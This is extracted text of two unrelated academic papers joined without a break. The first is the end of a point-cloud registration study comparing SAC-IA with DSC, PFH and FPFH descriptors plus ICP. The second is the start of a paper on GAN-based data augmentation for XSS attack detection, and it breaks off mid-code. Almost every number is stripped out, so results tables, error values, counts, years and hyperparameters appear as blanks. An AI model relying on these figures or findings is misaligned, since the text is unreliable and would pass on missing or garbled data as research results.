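    v = np.cross(d_vec / d, u)      # second axis, orthogonal to u and the line
    w = np.cross(u, v)              # third axis completes the frame
    alpha = np.dot(v, n_t)
    phi = np.dot(u, d_vec / d)
    theta = np.arctan2(np.dot(w, n_t), np.dot(u, n_t))
    return alpha, phi, theta, d

def spfh_like_histogram(point, normal, neighbors, neighbor_normals, bins=5):
    """Toy SPFH-style sketch: accumulate the three angular features between
    a query point and each of its neighbors into one concatenated histogram."""
    feats = np.asarray([pfh_pair_features(point, normal, q, nq)[:3]
                        for q, nq in zip(neighbors, neighbor_normals)])
    hist = [np.histogram(feats[:, i], bins=bins, range=(-1.0, 1.0))[0]
            for i in range(2)]                       # alpha and phi are in [-1, 1]
    hist.append(np.histogram(feats[:, 2], bins=bins,
                             range=(-np.pi, np.pi))[0])  # theta is an angle
    return np.concatenate(hist)
```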
d. experimental verification

in this experiment, the classic bunny point cloud model from stanford university (shown in fig. (a)) is used to compare the efficiency and accuracy of the three algorithms. finally, the tooth point cloud collected by the laboratory's point cloud acquisition equipment (shown in fig. (b)) is registered to verify the feasibility of the comparison results. in fig. , the green point cloud is the source point cloud and the red point cloud is the target point cloud. in the bunny point cloud model, the number of points in the source point cloud is , and the number in the target point cloud is ; for the tooth point cloud data collected in the laboratory, the number of points in the source point cloud is , and the number in the target point cloud is .

figure . point cloud data models: (a) bunny model; (b) tooth point cloud model

the general evaluation standard for point cloud registration is lcp (largest common pointset). that is, given two point sets p and q, a transformation t(p) is sought that maximizes the overlap between the transformed p and q. if, for a point in the transformed p, there is a point of q within the tolerance range, it is considered a coincident point; the proportion of coincident points among all points is the degree of overlap. in this paper, the registration accuracy is instead measured by the rotation errors, translation errors, and distance error of the registered point cloud relative to the target point cloud along the x-, y-, and z-axes; compared with lcp, these express the registration accuracy of the point cloud more intuitively. the experimental results of sac-ia registration based on the dsc, pfh, and fpfh feature descriptors are shown in fig. , where the red point cloud is the target point cloud and the blue point cloud is the registered point cloud.

figure . initial registration results: (a) dsc+sac-ia; (b) pfh+sac-ia; (c) fpfh+sac-ia

the registration time, the rotation angle errors on the x-, y-, and z-axes, the translation distance errors, and the distance error between the registered point cloud and the target point cloud for the two sets of bunny point clouds are shown in table i.

table i. initial registration errors (feature descriptors: dsc | pfh | fpfh)
sac-ia runtime: . s | . s | . s
x-axis rotation error: . ° | . ° | . °
y-axis rotation error: . ° | . ° | . °
z-axis rotation error: - . ° | - . ° | - . °
x-axis translation error: . mm | . mm | . mm
y-axis translation error: - . mm | - . mm | - . mm
z-axis translation error: - . mm | - . mm | - . mm
distance error: . mm | . mm | . mm

in terms of algorithm efficiency, dsc needs to calculate the surface shape characteristics of the point cloud, which increases the amount of computation, so it takes longer than pfh and fpfh; since fpfh is an improved algorithm based on pfh, the fpfh-based algorithm is the most efficient and takes the shortest time. in terms of algorithm accuracy, the smaller the rotation, translation, and distance errors along the x-, y-, and z-axes, the higher the accuracy of the algorithm.
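the per-axis rotation, translation, and distance errors used in table i (and later in table ii) can be computed by comparing an estimated transform with a reference transform. the exact error convention used by the authors is not spelled out, so the following is only an illustrative sketch, assuming numpy and scipy and reading the per-axis rotation errors off as xyz euler angles:

```python
import numpy as np
from scipy.spatial.transform import Rotation

def registration_errors(R_est, t_est, R_ref, t_ref, source_points):
    """Per-axis rotation errors (degrees), per-axis translation errors,
    and mean point-to-point distance between the source cloud registered
    with (R_est, t_est) and with the reference (R_ref, t_ref)."""
    # relative rotation between estimate and reference, as xyz Euler angles
    R_delta = R_ref.T @ R_est
    rot_err_deg = Rotation.from_matrix(R_delta).as_euler("xyz", degrees=True)
    trans_err = t_est - t_ref
    # distance error: mean distance between the two registered clouds
    p_est = source_points @ R_est.T + t_est
    p_ref = source_points @ R_ref.T + t_ref
    dist_err = np.linalg.norm(p_est - p_ref, axis=1).mean()
    return rot_err_deg, trans_err, dist_err
```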
from table i, it can be seen that the accuracy of the dsc-based sac-ia algorithm is higher than that of the fpfh- and pfh-based algorithms. therefore, the experimental results show that the algorithm based on the fpfh feature descriptor has the shortest registration time and the highest efficiency, while the algorithm based on the dsc feature descriptor has relatively high accuracy.

iv. iterative closest point

after the initial registration, the two sets of point cloud data roughly coincide, but the registration accuracy is still far from the requirements of practical applications; therefore, accurate registration of the point cloud data is required to reduce the registration error. in order to register the two groups of point clouds as closely as possible and minimize the error between them, this paper uses the classic iterative closest point (icp for short) algorithm for accurate registration. the icp algorithm[ ][ ] is the mainstream algorithm for 3d model registration. for each point in the source point cloud, an exhaustive search is performed in the target point cloud for the closest point, which is taken as the corresponding point; the transformation matrix is then estimated from all corresponding point pairs, and the source point cloud is finally transformed according to the obtained transformation matrix. if measurement error is not considered, the accuracy of the icp algorithm is affected by the measurement sampling density, and the error value is proportional to the average sampling distance; that is, the higher the sampling density, the higher the accuracy of the stitching. the basic principle of the icp algorithm is to find, under certain constraints, the nearest points between the target point cloud p and the source point cloud q to be registered, and then calculate the optimal rotation matrix r and translation matrix t that minimize the error function. the error function is given in eq. ( ):

f(R, t) = \frac{1}{n} \sum_{i=1}^{n} \left\| p_i - (R q_i + t) \right\|^2    ( )

where n is the number of nearest-neighbor point pairs, p_i is a point in the target point cloud p, q_i is the nearest point corresponding to p_i in the source point cloud q, r is the rotation matrix, and t is the translation matrix.
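a minimal, illustrative point-to-point icp loop corresponding to this description (not the pcl implementation used by the authors; names, iteration limits, and the convergence test are assumptions) can be sketched with a kd-tree for the closest-point search and the svd-based transform estimate:

```python
import numpy as np
from scipy.spatial import cKDTree

def best_fit_transform(src, dst):
    """SVD (Kabsch) estimate of R, t with dst ~= R @ src + t."""
    sc, dc = src.mean(axis=0), dst.mean(axis=0)
    U, _, Vt = np.linalg.svd((src - sc).T @ (dst - dc))
    R = Vt.T @ U.T
    if np.linalg.det(R) < 0:            # avoid reflections
        Vt[-1, :] *= -1
        R = Vt.T @ U.T
    return R, dc - R @ sc

def icp(source, target, max_iter=50, tol=1e-7):
    """Point-to-point ICP: repeatedly pair each source point with its
    nearest target point, then re-estimate the rigid transform."""
    tree = cKDTree(target)
    src = source.copy()
    R_total, t_total = np.eye(3), np.zeros(3)
    prev_err = np.inf
    for _ in range(max_iter):
        dists, idx = tree.query(src)            # closest-point search
        R, t = best_fit_transform(src, target[idx])
        src = src @ R.T + t                     # apply the incremental transform
        R_total, t_total = R @ R_total, R @ t_total + t
        err = (dists ** 2).mean()               # mean squared closest-point distance
        if abs(prev_err - err) < tol:           # stop when the error stabilizes
            break
        prev_err = err
    return R_total, t_total, err
```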
a. experimental verification

based on the initial registration results, the point cloud data are accurately registered by the icp algorithm. the results of the sac-ia algorithm based on the dsc, pfh, and fpfh feature descriptors combined with icp precise registration are shown in fig. .

figure . accurate registration results: (a) dsc+icp; (b) pfh+icp; (c) fpfh+icp

after icp precise registration, the initial registration time, precise registration time, rotation angle errors on the x-, y-, and z-axes, translation distance errors, and the distance error between the registered point cloud and the target point cloud are listed in table ii.

table ii. accurate registration errors (feature descriptors: dsc | pfh | fpfh)
total time: . s | . s | . s
sac-ia runtime: . s | . s | . s
icp runtime: . s | . s | . s
x-axis rotation error: . ° | . ° | . °
y-axis rotation error: . ° | . ° | . °
z-axis rotation error: - . ° | - . ° | - . °
x-axis translation error: . mm | . mm | . mm
y-axis translation error: - . mm | - . mm | - . mm
z-axis translation error: - . mm | - . mm | - . mm
distance error: . mm | . mm | . mm

as can be seen from table ii, in terms of algorithm efficiency, the sac-ia algorithm based on the fpfh feature descriptor combined with the icp algorithm takes a relatively shorter time. from the perspective of algorithm accuracy, the registration accuracy of the sac-ia algorithm based on the dsc, pfh, and fpfh feature descriptors combined with the icp precise registration algorithm does not differ much. therefore, for the dental point cloud model collected in the laboratory, the accuracy of the three descriptors is similar, but in terms of efficiency, the fpfh descriptor is more suitable for point cloud data with a large number of points. the tooth model is therefore registered using the sac-ia algorithm based on the fpfh feature descriptor together with the icp precise registration algorithm. the registration result is shown in fig. .

figure . tooth model registration results

v. conclusion

in this paper, the bunny point cloud is registered using the sac-ia algorithm based on dsc, pfh, and fpfh, and the efficiency and accuracy of the initial registration algorithms are analyzed and compared. in the initial registration, the sac-ia algorithm based on the dsc feature descriptor has relatively high accuracy but takes a long time, so it is suitable for registration with a small number of points and high accuracy requirements; the sac-ia algorithm based on the fpfh feature descriptor has high efficiency, so it is suitable for registration with a large number of points and high efficiency requirements. for the accurate registration algorithm, the icp algorithm of pcl is used in this paper, and judging from the registration results the effect is not ideal; the icp algorithm could be improved to raise the overall accuracy of the registration pipeline.

acknowledgment

the successful completion of this paper cannot be separated from the help of teachers, students, and funding. thanks to professor liu baolong, mr. wu qiong, and mr. si lipeng for their guidance and help. finally, i would like to thank the science and technology program of weiyang district of xi'an city (project no.: ) for its fund support.

references

[ ] besl p j, mckay h d. a method for registration of 3-d shapes. ieee transactions on pattern analysis and machine intelligence, ( ): - .
[ ] biber p, straßer w. the normal distributions transform: a new approach to laser scan matching. in proceedings of the ieee international conference on intelligent robots and systems (iros), las vegas, usa.
[ ] greenspan m, yurick m. approximate k-d tree search for efficient icp. in proceedings of the fourth international conference on 3-d digital imaging and modeling (3dim), banff, alberta, canada.
[ ] nüchter a, lingemann k, hertzberg j. cached k-d tree search for icp algorithms. in proceedings of the sixth international conference on 3-d digital imaging and modeling (3dim), montreal, quebec, canada. ieee.
[ ] jost t, hügli h. fast icp algorithms for shape registration. in pattern recognition. springer berlin heidelberg.
[ ] silva l, bellon o r, boyer k l. precision range image registration using a robust surface interpenetration measure and enhanced genetic algorithms. ieee transactions on pattern analysis & machine intelligence, ( ): - .
[ ] du s, liu j, zhang c, zhu j, li k. probability iterative closest point algorithm for m-d point set registration with noise. neurocomputing, : - .
[ ] chetverikov d, stepanov d, krsek p. robust euclidean alignment of 3d point sets: the trimmed iterative closest point algorithm. image and vision computing, ( ): - .
[ ] zhu dehai. pcl course of dianyun library. beijing university of aeronautics and astronautics.
[ ] frome a, huber d, kolluri r, bülow t, malik j. recognizing objects in range data using regional point descriptors. in proceedings of the european conference on computer vision (eccv), prague, czech republic, pp. - .
[ ] rusu r b, blodow n, beetz m. fast point feature histograms (fpfh) for 3d registration. in proceedings of the ieee international conference on robotics and automation (icra).
[ ] zhang z. iterative point matching for registration of free-form curves and surfaces. international journal of computer vision, ( ): - .
[ ] chen y, medioni g. object modeling by registration of multiple range images. image and vision computing, ( ): - .

submitted august , accepted november , published december . corresponding author: fawaz mahiuob mohammed mokbal, fawaz@emails.bjut.edu.cn. academic editor: shuihua wang. copyright mokbal et al., distributed under creative commons cc-by.

data augmentation-based conditional wasserstein generative adversarial network-gradient penalty for xss attack detection system

fawaz mahiuob mohammed mokbal,*, dan wang,*, xiaoxi wang and lihua fu
college of computer science, faculty of information technology, beijing university of technology, beijing, china
faculty of computer science, ilma university, karachi, pakistan
state grid management college, beijing, china
* these authors contributed equally to this work.

abstract

the rapid growth of the worldwide web and the accompanying opportunities of web applications in various aspects of life have attracted the attention of organizations, governments, and individuals. consequently, web applications have increasingly become the target of cyberattacks. notably, cross-site scripting (xss) attacks on web applications are increasing and have become the critical focus of information security experts' reports. machine learning (ml) techniques have significantly advanced and shown impressive results in the area of cybersecurity. however, xss training datasets are often limited and significantly unbalanced, which does not meet the requirements of well-developed ml algorithms and potentially limits detection system efficiency. furthermore, xss attacks have multiple payload vectors that execute in different ways, resulting in many real threats passing through the detection system undetected. in this study, we propose a conditional wasserstein generative adversarial network with a gradient penalty to enhance xss detection in a low-resource data environment. the proposed method integrates a conditional generative adversarial network and a wasserstein generative adversarial network with a gradient penalty to obtain the necessary data with directivity, which improves the strength of the security system over unbalanced data. the proposed method generates synthetic samples of the minority class that have an identical distribution to real xss attack scenarios. the augmented data were used to train a new boosting model, which was subsequently evaluated using a real test dataset.
experiments on two unbalanced xss attack datasets demonstrate that the proposed model generates valid and reliable samples. furthermore, the samples were indistinguishable from real xss data and significantly enhanced the detection of xss attacks compared with state-of-the-art methods.

subjects: artificial intelligence, computer networks and communications, data mining and machine learning, security and privacy, world wide web and web science
keywords: data augmentation, conditional-wasserstein generative adversarial net, imbalanced dataset, xss attack, web applications security

introduction

over the last decade, the worldwide web has grown exponentially, and web applications are increasingly being deployed to provide sustainable and accessible services to the public. these have attracted the attention of governments, companies, and individuals. similarly, cyberattacks on web applications are increasing, consequently raising the risks to web applications and their users. the cross-site scripting (xss) attack is one of the prevalent and growing attacks on web applications. successful xss attacks lead to various degrees of consequences for users, governments, and businesses. for the user, xss attacks can be used to steal sensitive user information such as user credentials and session tokens, or to impersonate the user to carry out authorized actions on the user's behalf. for businesses and governments, xss attacks can be used to change the appearance or behavior of target websites and to steal confidential information. these authorities may face dire consequences, including loss of reputation, legal battles, and financial losses (deepa & thilagam, ). cybercriminals exploit security vulnerabilities within web applications that are often caused by several factors, including the level of application programmers' experience in security and vulnerabilities inherited from open-source and third-party packages. these security vulnerabilities can allow cybercriminals to inject malicious content into trusted html pages displayed to end-users (sarmah, bhattacharyya & kalita, ). state-of-the-art xss attack detection systems are applied on the server-side, the client-side, or both. the analysis methods used to distinguish between malignant and benign payloads can be static, dynamic, or hybrid (sarmah, bhattacharyya & kalita, ). however, these methods have limitations, such as a low detection rate (dr), high false positive (fp)/negative rates, and often poor scalability over time (mitropoulos & spinellis, ); therefore, they are inefficient, especially against emerging techniques and evolving forms of xss payloads developed continuously by cybercriminals (lekies et al., ; zhou & wang, ). in , xss attacks became the most widespread attack vector: approximately % of cyberattacks have been attributed to xss attacks, according to precise security research (precise security, ), and this share is expected to increase significantly in the future.
furthermore, the overall number of new xss vulnerabilities in ( , ) increased by . % compared with that in ( , ), as per the national vulnerabilities database (national institute of standards and technology, ). additionally, there are various reports and warnings from information security experts in industrial control systems vulnerabilities statistics (andreeva et al., ). many studies in the related literature used fp as the metric to measure model accuracy instead of dr, which reveals the effect of unbalanced data and can be expensive in the cybersecurity domain (elkan, ). technically, the dr represents the effective detection of attacks and is a critical factor in detection systems. when the dr is not clearly reported, it raises concerns about the cybersecurity system's effectiveness; consequently, a growing number of major risks go unidentified by various tools/models (deepa & thilagam, ; lekies et al., ). existing machine learning (ml) techniques have proven to be highly efficient in handling security challenges. the algorithms are trained using data of previously known behaviors (supervised learning), and each class of behavior is recognized as either anomalous or legitimate. however, web pages are a mixture of multiple languages such as javascript and html, which were formerly unstandardized, enabling the use of various coding techniques that are susceptible to attacks. therefore, xss attacks have peculiar and irregular characteristics; further, the volume of labeled data on xss attacks with up-to-date cases is limited and highly unbalanced (obimbo, ali & mohamed, ; nunan et al., ; mokbal et al., ). consequently, applying most standard ml algorithms to xss data in a straightforward manner is unsuitable and challenging compared with other well-developed, clean data domains (vluymans, ; mokbal et al., ). to the best of our knowledge, the limited and unbalanced data of xss cyber-attacks in ml-based detection have not been addressed in the literature, which makes this worth studying. a detection system is invariably affected by the class imbalance problem. specifically, ml algorithms focus on maximizing accuracy, which technically means that all misclassification errors are handled equally and uniformly, implying that the algorithms do not handle unbalanced datasets well even if the data are accurate and clean (vluymans, ). in such a setting, a learning algorithm may discard instances of the minority class in the dataset. the attack samples are often in the minority class and are handled as noise, while only samples of the majority class are recognized (buda, maki & mazurowski, ). therefore, the design of an ml-based model should consider the dataset's weighting and evaluation criteria (vluymans, ). the traditional methods for addressing the challenges of limited and unbalanced data are oversampling the minority class or undersampling the majority class; yet each method has its limitations. oversampling can lead to overfitting, whereas undersampling may discard useful data, which subsequently leads to loss of information (vluymans, ). to mitigate the challenges of a limited and highly unbalanced xss attack dataset, we propose a data augmentation method based on the conditional gan and the wasserstein gan with a gradient penalty (c-wgan-gp).
our proposed method aims to oversample the minority class using a more robust generative approach, rebalancing the training dataset by adding identical and valid samples to the minority class. the samples are generated based on the minority class's overall distribution, learned by the c-wgan-gp generative network, instead of local information as the traditional methods do. the generative adversarial network (gan) (goodfellow et al., ) is considered a potential solution to the challenges described above. it is a type of deep generative model that aims to learn the joint probability distribution of samples and labels from training data, which can be further used for several applications such as predictor training, classification, and data augmentation (pan et al., ). the main contributions of this study can be summarized as follows:
• we propose wgan-based adversarial training conditioned on the minority class (attack labels) to generate valid and indistinguishable samples of real xss attack data. to preserve the various features covering the data space range and enable the generator to learn the original data space distribution, we pass the upper and lower data space to the conditional generator. furthermore, the augmented data are not added to the real training data arbitrarily; the process is performed only if the generated sample x̃ satisfies the critic. this ensures that the added samples are identical to the real data and improve the training data.
• we further propose a boosting classification model using the xgboost algorithm trained on the augmented training dataset generated by c-wgan-gp, which significantly improves the attack detection efficiency.
• the proposed method is evaluated on two real and large unbalanced xss attack datasets. experiments show that our proposed augmentation framework generates valid samples indistinguishable from real xss data and outperforms state-of-the-art methods in xss attack detection. although we present the proposed framework specifically for xss attack detection, it can be generalized and extended to other application areas.
the rest of this study is organized as follows: in 'related work', we review the most related literature. in 'proposal and experimental methodology', we introduce the model design and the experimental methodology. we present the results and discussion in 'results and discussion'. 'conclusions' presents the conclusion and future work.

related work

web applications have become part of our everyday lives and have achieved significant success and substantial financial gains for organizations; consequently, ml-based xss attack detection has gained much attention from the research community. however, there are challenges in using ml-based methods, including finding or designing an adequate, accurate, and balanced dataset suitable for ml algorithms. unfortunately, there is no public and standard dataset intended for this purpose (obimbo, ali & mohamed, ; nunan et al., ), so researchers create their own datasets based on their requirements and orientation (mokbal et al., ). the authors of (rathore, sharma & park, ) proposed a classifier model against xss attacks for social sites using their own dataset, which consists of samples collected from xssed, alexa, and elgg. they applied multiple algorithms and achieved the best results using the random forest algorithm.
however, the dataset used to train the algorithm is small, possibly selective, and may not reflect real attacks; moreover, the dr score of . was considered inadequate. wang et al. ( ) proposed a hybrid analysis method to detect malicious web pages by extracting and using three sets of features: url, html, and javascript. the reported dr was . %, implying that the method fails to detect . % of real threats. another research work (wang, cai & wei, ) proposed a deep learning model (stacked denoising autoencoder) to detect malicious code, using sparse random projections to reduce the dimensionality of the data. despite the model's complexity, the dr score was . , which is inadequate for detecting malicious attacks; moreover, the model has a high fp rate of . % together with a high computational cost. wang et al. ( ) used an ensemble learning method (adtree and adaboost) to detect xss attacks. however, the dr score of . is inadequate, with a high fp rate of . %. mokbal et al. ( ) proposed a scheme based on dynamic feature extraction and a deep neural network to detect xss attacks. using their developed dataset, they achieved an estimated dr of . %. however, the model is a deep neural network, which has potentially high computational costs. multiple studies (lópez et al., ; haixiang et al., ) have thoroughly investigated the problem of unbalanced data. the problem can be mitigated at two levels: first, at the model level, by modifying existing algorithms to focus more on the minority class, such as embedding cost-sensitive methods in an ensemble learning algorithm, and second, at the data level, by preprocessing the data before they are fed into the algorithm (lópez et al., ). the data-level approach uses either undersampling or oversampling. undersampling mitigates class imbalance by randomly removing some samples from the majority class in the training dataset; conversely, oversampling mitigates class imbalance by duplicating some minority class samples in the training dataset. however, these methods can result in the loss of important information and overfitting, respectively. kovács et al. ( ) proposed the synthetic minority oversampling technique (smote) as an oversampling method for the minority class. however, this method generates an equal number of synthetic samples for each real sample from the minority class without considering neighboring samples; consequently, the overlap between classes increases, with the potential generation of noisy samples (vluymans, ). adaptive variants of smote have been proposed, including borderline-smote and dbsmote. borderline-smote (han, wang & mao, ) concentrates synthetic samples along the borderline between classes, the cluster-based algorithm dbsmote (bunkhumpornpat, sinapiromsaran & lursinsap, ) assembles data samples into clusters using dbscan clustering, and adaptive synthetic sampling (he et al., ) adjusts the number of synthetic samples per minority instance. however, these methods are based on local information instead of on the overall minority-class distribution (douzas & bacao, ).
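for reference, these traditional oversampling baselines are available in the imbalanced-learn package; a minimal usage sketch (not part of the authors' pipeline, using toy data in place of an xss feature matrix) is shown below:

```python
from collections import Counter

from imblearn.over_sampling import SMOTE, BorderlineSMOTE, ADASYN
from sklearn.datasets import make_classification

# toy unbalanced data standing in for an XSS feature matrix X and labels y
X, y = make_classification(n_samples=5000, n_features=20,
                           weights=[0.97, 0.03], random_state=42)
print("before:", Counter(y))

for sampler in (SMOTE(random_state=42),
                BorderlineSMOTE(random_state=42),
                ADASYN(random_state=42)):
    X_res, y_res = sampler.fit_resample(X, y)   # resample only the training split
    print(type(sampler).__name__, Counter(y_res))
```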
proposal and experimental methodology

this section presents the different generative networks, including gan, cgan, wgan, and wgan-gp, in addition to our proposed model. the model architecture, the experimental methodology design, the xgboost attack detector, and the datasets are also presented.

gans

the gan was recently introduced as a novel approach to train a generative model and has achieved success in different fields, including images and natural language processing (goodfellow et al., ). the network comprises two adversarial models: first, the generative model g, which learns the distribution of the data, and second, the discriminator d, which estimates the probability that a sample came from the real training data rather than from g. both models compete to outsmart each other, where g and d can be nonlinear mapping functions, such as multilayer perceptrons. the generator g learns a distribution pg over the data x and constructs a mapping function from a noise space of uniform dimension pz(z) to the data space as g(z, θg). the discriminator d(x, θd) returns a single scalar estimating the probability that an instance x came from the real data distribution rather than from pg. both g and d are trained together such that the parameters of g are adjusted to minimize log(1 − d(g(z))) while the parameters of d are adjusted to maximize log d(x), as in a two-player minimax game with value function v(g, d) given in eq. ( ):

\min_G \max_D V(G,D) = \mathbb{E}_{x \sim p_r}[\log D(x)] + \mathbb{E}_{\tilde{x} \sim p_g}[\log(1 - D(G(z)))]    ( )

a cgan extends the gan by adding a space y to both g and d to control data generation. the additional space y could be supplied from the real data (class labels) or from other sources (mirza & osindero, ). the training phase of the cgan is similar to that of the gan, and the minimax objective function of d and g is shown in eq. ( ):

\min_G \max_D V(G,D) = \mathbb{E}_{x \sim p_r}[\log D(x|y)] + \mathbb{E}_{\tilde{x} \sim p_g}[\log(1 - D(G(z|y), y))]    ( )

where pr is the real data distribution and pg is the cgan model distribution implicitly defined by x̃ = g(z|y), z ∼ p(z), y ∼ p(y), where y and the noise z are combined as input to the hidden layer. the cgan and gan use the jensen–shannon (js) divergence shown in eq. ( ) to measure the generated samples:

JS(p_r, p_g) = \tfrac{1}{2} KL(p_r \,\|\, p_m) + \tfrac{1}{2} KL(p_g \,\|\, p_m), \quad p_m = (p_r + p_g)/2    ( )

where kl is the kullback–leibler divergence. however, both the gan and the cgan suffer from unstable training (vanishing gradients) and mode collapse (pan et al., ). to overcome these problems, the wgan optimizes the original gan objective using the wasserstein-1 distance, also known as the earth-mover distance (emd), instead of js (arjovsky, chintala & bottou, ), where the emd measures the distance between the actual data distribution and the distribution of the generative model as in eq. ( ):

W(p_r, p_g) = \inf_{\gamma \in \Pi(p_r, p_g)} \mathbb{E}_{(x,y) \sim \gamma}\left[\,\|x - y\|\,\right]    ( )

where Π(pr, pg) denotes the set of all possible joint distributions γ(x, y) whose marginals are the real data distribution pr and the generated data distribution pg, respectively. for each feasible joint distribution γ, a real instance x and a generated instance y can be sampled and their distance ‖x − y‖ calculated; therefore, the expected value E(x,y)∼γ[‖x − y‖] of this distance under the joint distribution γ can be computed. the value function of the wgan is obtained using the kantorovich–rubinstein duality (villani, ), as shown in eq. ( ):

\min_G \max_{D \in \mathcal{F}} V(G,D) = \mathbb{E}_{x \sim p_r}[D(x)] - \mathbb{E}_{\tilde{x} \sim p_g}[D(\tilde{x})]    ( )

where F is the set of 1-lipschitz functions bounded by k, |f(x) − f(y)| ≤ k|x − y|, and pg is the model distribution. the value function is minimized with respect to g, determined by x̃ = g(z), z ∼ p(z). therefore, the discriminator, called a critic, minimizes w(pr, pg).
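to make the wgan value function above concrete, the following pytorch-style sketch (illustrative only; it is not the authors' code, and the clipping constant is an assumption) shows how the critic and generator losses of eq. ( ) are typically computed, with the lipschitz constraint of the original wgan enforced by weight clipping:

```python
import torch

def critic_loss(critic, real_x, fake_x):
    """WGAN critic loss: minimize E[D(fake)] - E[D(real)],
    which is equivalent to maximizing E[D(real)] - E[D(fake)]."""
    return critic(fake_x).mean() - critic(real_x).mean()

def generator_loss(critic, fake_x):
    """WGAN generator loss: minimize -E[D(fake)]."""
    return -critic(fake_x).mean()

def clip_critic_weights(critic, c=0.01):
    """Original WGAN Lipschitz constraint enforced by weight clipping."""
    with torch.no_grad():
        for p in critic.parameters():
            p.clamp_(-c, c)
```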
nevertheless, the wgan still faces gradient vanishing or gradient explosion because of the weight clipping in the discriminator. a gradient penalty (gp) was therefore added to the total loss function of the wgan critic to achieve training stability (gulrajani et al., ). the adjusted objective value function is shown in eq. ( ):

\min_G \max_D V(G,D) = \mathbb{E}_{x \sim p_r}[D(x)] - \mathbb{E}_{\tilde{x} \sim p_g}[D(\tilde{x})] - \lambda \, \mathbb{E}_{\hat{x} \sim p_{\hat{x}}}\big[(\|\nabla_{\hat{x}} D(\hat{x})\|_2 - 1)^2\big]    ( )

where x̂ = εx + (1 − ε)x̃ is a convex combination of samples from the real data distribution pr(x) and the model distribution pg(z), ε ∼ uniform[0, 1], and λ is the gradient penalty coefficient.
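the gradient penalty term of eq. ( ) can be illustrated with a short pytorch sketch (not the authors' implementation; tensor shapes, the optional label argument, and names are assumptions):

```python
import torch

def gradient_penalty(critic, real_x, fake_x, labels=None, lam=10.0):
    """Penalize deviations of the critic's gradient norm from 1 at points
    interpolated between real and generated samples (WGAN-GP)."""
    eps = torch.rand(real_x.size(0), 1, device=real_x.device)   # epsilon ~ U[0, 1]
    x_hat = (eps * real_x + (1.0 - eps) * fake_x.detach()).requires_grad_(True)
    d_hat = critic(x_hat, labels) if labels is not None else critic(x_hat)
    grads = torch.autograd.grad(outputs=d_hat.sum(), inputs=x_hat,
                                create_graph=True)[0]
    grad_norm = grads.view(grads.size(0), -1).norm(2, dim=1)
    return lam * ((grad_norm - 1.0) ** 2).mean()
```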
c-wgan-gp model

this study proposes data augmentation based on a gan that takes real samples as inputs and outputs adversarial samples. the learning algorithm of our proposed model is based on the cgan (mirza & osindero, ) and wgan-gp (gulrajani et al., ), where both networks are integrated; precisely, we use the wgan-gp optimization approach to optimize the cgan. the integrated generative network is called c-wgan-gp. our goal is to generate synthetic samples of the attack (minority) class with a distribution identical to real xss attack scenarios. the primary idea is to learn the joint probability distribution over samples x and labels y from the training data and to perform data augmentation only if the generated sample x̃ satisfies the critic. the problem of unbalanced data can thus be mitigated by using the augmented data in the classification task, thereby improving the robustness and performance of xss attack detection on unbalanced data. a well-trained generator, with the joint distributions (x, y) of the real and generated data distributions pr and pg optimized using the gp, should be able to generate (x̃, y) samples within the tolerated latent space and identical to the original data (x, y), therefore providing valuable information to the detector as additional training data. to ensure that only useful instances are added to augment the training dataset, only generated cases that satisfy the critic are added to the original data. the y labels of the minority class, which are xss attacks in our case, are used as the conditional parameter. passing the upper and lower real data space to the generator provides the generator with additional auxiliary information to define the latent space. the latent space establishes the scope of samples in the data variance; therefore, the generator using the auxiliary latent space generates samples within the tolerated latent space that are identical to the real data. consequently, the discriminator judges the synthetic samples as real within the small feedback loops needed to train the generator, reducing computational cost while providing high-quality generated data. in the discriminator d, pr and pg are linked with y in a joint hidden layer representation, whereas in the generator g, y is combined with p(z) in the same manner. the objective minimax function of models d and g is shown in eq. ( ), whereas eqs. ( ) and ( ) give the loss functions minimized by d and g, respectively:

\min_G \max_{D \in \mathcal{F}} V(G,D) = \mathbb{E}_{x \sim p_r}[D(x|y)] - \mathbb{E}_{\tilde{x} \sim p_g}[D(\tilde{x}|y)] - \lambda \, \mathbb{E}_{\hat{x} \sim p_{\hat{x}}}\big[(\|\nabla_{\hat{x}} D(\hat{x}|y)\|_2 - 1)^2\big]    ( )

\min L(D) = \mathbb{E}_{\tilde{x} \sim p_g}[D(\tilde{x}|y)] - \mathbb{E}_{x \sim p_r}[D(x|y)] + \lambda \, \mathbb{E}_{\hat{x} \sim p_{\hat{x}}}\big[(\|\nabla_{\hat{x}} D(\hat{x}|y)\|_2 - 1)^2\big]    ( )

\min L(G) = - \mathbb{E}_{\tilde{x} \sim p_g}[D(\tilde{x}|y)]    ( )

generative model design

generative networks have gained popularity on image data; however, we are interested in numerical datasets. therefore, the technique used is similar but differs in design and implementation. in our model, we did not apply convolutional layers. in the generator model g, the concatenated input layer is equal to (z + c), where z is the noise vector whose size is set by the batch size and data dimension, and c is the dimension of the conditioning variable, which equals . the model has three hidden neural network layers, with , , and units, respectively; the output layer is equal to z, and the concatenated layer is equal to the input layer (z + c). in the discriminator (critic) d, the same architecture is used but with the hidden layers in descending order, equal to , , and units, respectively; the final layer is a linear activation of size . the batch size and number of epochs for the network are and , respectively. the activation function used for the generator and discriminator is the rectified linear unit. the c-wgan-gp is fitted using the adam optimizer with the α, β1, and β2 parameters calibrated to 1e- , . , and . , respectively; α (alpha) refers to the learning rate, while β1 and β2 refer to the exponential decay rates for the first-moment and second-moment estimates, respectively. the value of the gp coefficient λ for c-wgan-gp is set to . the parameter k of d is tuned to , whereas k of g is tuned to . a conditional critic neural network is trained to approximate the emd using the minority class as the control mode for up to training steps. note that the parameters were chosen empirically, and performance degrades significantly when they are changed. the other hyperparameters not mentioned here are consistent with those originally reported. during the testing phase, the generated samples added to the real dataset are only those approved by the critic. the algorithm box below presents the generative approach for xss attack data. note that the other generator network architectures are similar, with negligible differences that may be necessary for implementation.
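a minimal pytorch sketch of such a conditional generator and critic is given below. the hidden-layer widths, noise dimension, and feature dimension shown are placeholders rather than the paper's tuned values, and the code is illustrative rather than the authors' implementation:

```python
import torch
import torch.nn as nn

class Generator(nn.Module):
    """MLP generator: noise z concatenated with a condition label y."""
    def __init__(self, z_dim=64, cond_dim=1, out_dim=40, hidden=(128, 256, 512)):
        super().__init__()
        layers, prev = [], z_dim + cond_dim
        for h in hidden:
            layers += [nn.Linear(prev, h), nn.ReLU()]
            prev = h
        layers.append(nn.Linear(prev, out_dim))
        self.net = nn.Sequential(*layers)

    def forward(self, z, y):
        return self.net(torch.cat([z, y], dim=1))

class Critic(nn.Module):
    """MLP critic: sample x concatenated with the condition label y,
    ending in a single linear (unbounded) score, as WGAN-style critics do."""
    def __init__(self, in_dim=40, cond_dim=1, hidden=(512, 256, 128)):
        super().__init__()
        layers, prev = [], in_dim + cond_dim
        for h in hidden:
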